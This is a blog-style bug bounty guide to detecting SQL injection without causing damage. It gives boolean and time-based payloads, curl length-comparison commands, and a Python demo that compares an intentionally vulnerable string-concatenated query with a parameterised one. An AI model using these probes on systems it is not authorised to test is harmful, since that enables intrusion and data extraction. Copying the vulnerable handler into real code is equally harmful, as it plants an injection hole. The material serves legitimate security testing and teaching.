SQL Injection — Practical Bug Bounty Guide

Non-destructive detection, triage templates, and safe PoCs for hunters
Written by 4cid.burn · October 23, 2025 · The Undergrid

Every hunter starts here

Before API fuzzers, before massive recon, before you automate half the internet — there’s SQL Injection.

It’s not nostalgia. It’s anatomy. If you don't understand how SQLi really works, you don't understand how the web breathes. The single quote that changes a query is the smallest, most honest probe of a system's trust. It reveals where data becomes logic.

Modern hunters who lean only on tools miss what the quiet ones see: why an ORM call becomes unsafe when string concatenation survives a refactor, or why a mobile API that 'looks safe' exposes the same vulnerabilities as a legacy admin page. Understand the substrate and you stop chasing symptoms.

SQLi evolved — it's not the same old bug

The low-hanging fruit has been picked. What remains are the corner cases: JSON keys injected into raw queries, query builders abused by dynamic filters, secondary endpoints inside microservices that escaped code review. Expertise is pattern recognition: seeing the developer's assumptions and breaking them.

When you think like the database — what it expects, what it tolerates, how it formats errors — you craft PoCs that are quiet, precise, and triage-friendly.

The ground truth

The database never lies. Every input that reaches it carries the fingerprint of the developer’s trust. SQLi teaches you to read that trust backwards — to see how the app's faith in input becomes its undoing. Once you see it, you test assumptions, not just inputs.

A Hunter’s Toolkit — Non-destructive Proofs

Baseline
  GET /product?id=10
True condition
  GET /product?id=10' AND 1=1--
False condition
  GET /product?id=10' AND 1=2--
Comment terminator: MySQL only treats -- as a comment when whitespace follows it, so a bare trailing -- that lands in front of the closing quote errors on both branches and gives you no differential. Against MySQL send -- - (encoded as --%20-) or # (encoded as %23); PostgreSQL, SQLite and SQL Server accept the bare --.
Curl validation (length-based)
  curl -s -G --data-urlencode "id=10" "https://target.example.com/product" -o /tmp/base && wc -c /tmp/base
  curl -s -G --data-urlencode "id=10' AND 1=1--" "https://target.example.com/product" -o /tmp/t && wc -c /tmp/t
  curl -s -G --data-urlencode "id=10' AND 1=2--" "https://target.example.com/product" -o /tmp/f && wc -c /tmp/f
-G with --data-urlencode sends the payload as a percent-encoded query string; pasting the raw quote and spaces straight into the URL gets the request rejected by recent curl versions or mangled in transit. Expect base and t to match and f to differ. Fetch the baseline twice first: if its length drifts between identical requests, length comparison proves nothing.
Time-based probe (MySQL syntax; use sparingly)
  GET /item?id=5' AND IF(SUBSTRING((SELECT database()),1,1)='a', SLEEP(2), 0)--
Measure against the baseline round-trip and repeat before trusting a delay; two seconds is enough to see and short enough not to tie up the worker pool.
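The three-request differential above, carried out end to end as an added example that is not part of the original article. The target is a constructed in-memory SQLite table with invented product rows; vulnerable_lookup and hardened_lookup are hypothetical request handlers standing in for the /product endpoint (one with the concatenation that survived a refactor, one with a bound parameter), and boolean_probe takes any fetch function, so the same logic runs unchanged over a real HTTP GET.

```python
"""Boolean-based SQLi differential, run offline against a constructed target.

Added example for this guide, not code from The Undergrid article. The
"endpoint" is an in-memory SQLite table with invented product rows, and
vulnerable_lookup / hardened_lookup are hypothetical handlers.
"""
import sqlite3
from typing import Callable

# Constructed sample target standing in for /product?id=. Rows are invented.
_db = sqlite3.connect(":memory:")
_db.executescript(
    """
    CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
    INSERT INTO products VALUES (10, 'Widget', 9.99), (11, 'Gadget', 19.99);
    """
)


def render(rows: list) -> str:
    """Minimal HTML body; its length is what the probe compares."""
    if not rows:
        return "<html><body><p>Product not found</p></body></html>"
    items = "".join(f"<li>{name}: {price:.2f}</li>" for name, price in rows)
    return f"<html><body><ul>{items}</ul></body></html>"


def vulnerable_lookup(product_id: str) -> str:
    """The refactor where string concatenation survived: the parameter lands
    inside a quoted literal, so a single quote rewrites the WHERE clause.
    SQLite (like PostgreSQL) treats a bare trailing -- as a comment; MySQL
    would need '-- -' here instead."""
    query = f"SELECT name, price FROM products WHERE id = '{product_id}'"
    try:
        return render(_db.execute(query).fetchall())
    except sqlite3.Error as exc:
        # A verbose error page is its own signal, but the probe below only
        # needs the length to differ from the baseline.
        return f"<html><body><pre>Database error: {exc}</pre></body></html>"


def hardened_lookup(product_id: str) -> str:
    """Same query with a bound parameter: the payload is compared as one
    opaque string against id and simply matches nothing."""
    query = "SELECT name, price FROM products WHERE id = ?"
    return render(_db.execute(query, (product_id,)).fetchall())


def boolean_probe(fetch: Callable[[str], str], base_id: str = "10") -> dict:
    """Length-based boolean differential, the check the curl/wc lines above
    do by hand, over one fetch function (an HTTP GET in a real test).

    A hit requires the always-true branch to match the baseline AND the
    always-false branch to diverge from it. If true == false, either the
    quote never reached the parser or both branches failed the same way;
    neither is evidence of injection.
    """
    baseline = fetch(base_id)
    # Dynamic pages (timestamps, CSRF tokens, ads) shift length between
    # identical requests; length comparison is meaningless until this holds.
    stable = len(fetch(base_id)) == len(baseline)
    payloads = {
        "true": f"{base_id}' AND 1=1--",
        "false": f"{base_id}' AND 1=2--",
    }
    lengths = {"baseline": len(baseline)}
    lengths.update({name: len(fetch(p)) for name, p in payloads.items()})
    injectable = (
        stable
        and lengths["true"] == lengths["baseline"]
        and lengths["false"] != lengths["baseline"]
    )
    return {"stable": stable, "lengths": lengths, "injectable": injectable}


if __name__ == "__main__":
    for name, handler in (("vulnerable", vulnerable_lookup), ("hardened", hardened_lookup)):
        print(name, boolean_probe(handler))
```

Against the vulnerable handler the true branch returns the Widget row and the false branch returns the not-found page, so the lengths split exactly as the curl/wc comparison expects; against the bound-parameter handler both payloads compare as a single string against the integer id, both return not-found, and the probe correctly reports no injection. The stability pre-check is the step most automated scanners skip and the usual source of false positives on dynamic pages.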

Why this matters for a bug bounty hunter

Because every injection teaches you about trust boundaries. Knowing SQLi isn't just about getting a PoC — it's about pivoting: from a web parameter to a mobile API to a microservice, all with the same mental model. It shifts you from a scanner operator to a solver.

In reports, triagers respond to clarity and minimalism. A good PoC shows how the DB behaved differently — not a data dump of everything you guessed. That discipline increases signal, reduces noise, and gets bounties paid faster.

Field advice — hunting with restraint

Start manual. Confirm boolean differences and length or timing deltas by hand before automating. When you reach for automated tools, keep their aggressiveness down (sqlmap's --level and --risk at their defaults, for instance). If you need to enumerate sensitive tables, ask triage for permission first; aggressive enumeration kills programs and reputations.

Protect the asset as you test it. Responsible testing is a mark of professionalism, and professionalism pays in the long run — both reputationally and financially.